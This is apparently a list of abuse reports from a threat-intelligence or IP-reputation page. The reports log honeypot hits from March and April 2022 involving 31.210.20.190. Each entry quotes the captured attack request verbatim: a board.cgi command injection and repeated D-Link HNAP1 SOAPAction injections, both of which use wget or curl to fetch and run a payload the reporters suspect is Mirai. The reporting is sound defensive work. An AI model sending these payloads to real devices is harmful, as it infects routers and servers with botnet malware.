Honeypot Hit:
@2022-03-27 21:46:05
GET-Request to:
'http' on URI: '//board.cgi?cmd=cd%20%2Ftmp%20 ...
show moreHoneypot Hit:
@2022-03-27 21:46:05
GET-Request to:
'http' on URI: '//board.cgi?cmd=cd%20%2Ftmp%20rm%20-rf%200day-0%3B%20wget%20http%3A%2F%2F31.210.20.190%2F0day-0%3B%20chmod%20777%200day-0%3B%20.%2F0day-0%200day-0%3B%20rm%20-rf%200day-0%3B%20curl%20-O%20http%3A%2F%2F31.210.20.190%2F0day-0%3B%20chmod%20777%200day-0%3B%20.%2F0day-0%200day-0'
with User-Agent: 'Go-http-client/1.1'
and Payload: 'not set'
show less
Hacking
Bad Web Bot
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 64.31.7.194 at:
Time: Fri, 01 Apr 2022 09:11:34 +0200
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.210.20.190/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 64.31.7.194 at:
Time: Fri, 01 Apr 2022 09:19:02 +0200
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.210.20.190/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 212.192.246.124 at:
Time: Mon, 14 Mar 2022 04:12:30 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.210.20.190/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 34.83.198.237 at:
Time: Mon, 14 Mar 2022 03:41:12 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.210.20.190/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less
Hacking
Exploited Host
Anonymous
Possibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HT ...
show morePossibly hosting malicious download (shellcode, Mirai variant?) found in wget command embedded in HTTP request from 212.192.246.124 at:
Time: Sun, 13 Mar 2022 22:46:46 +0100
Request: POST /HNAP1/ HTTP/1.1
Port 80
SOAP Action: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.210.20.190/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
User Agent: Mozila/5.0
show less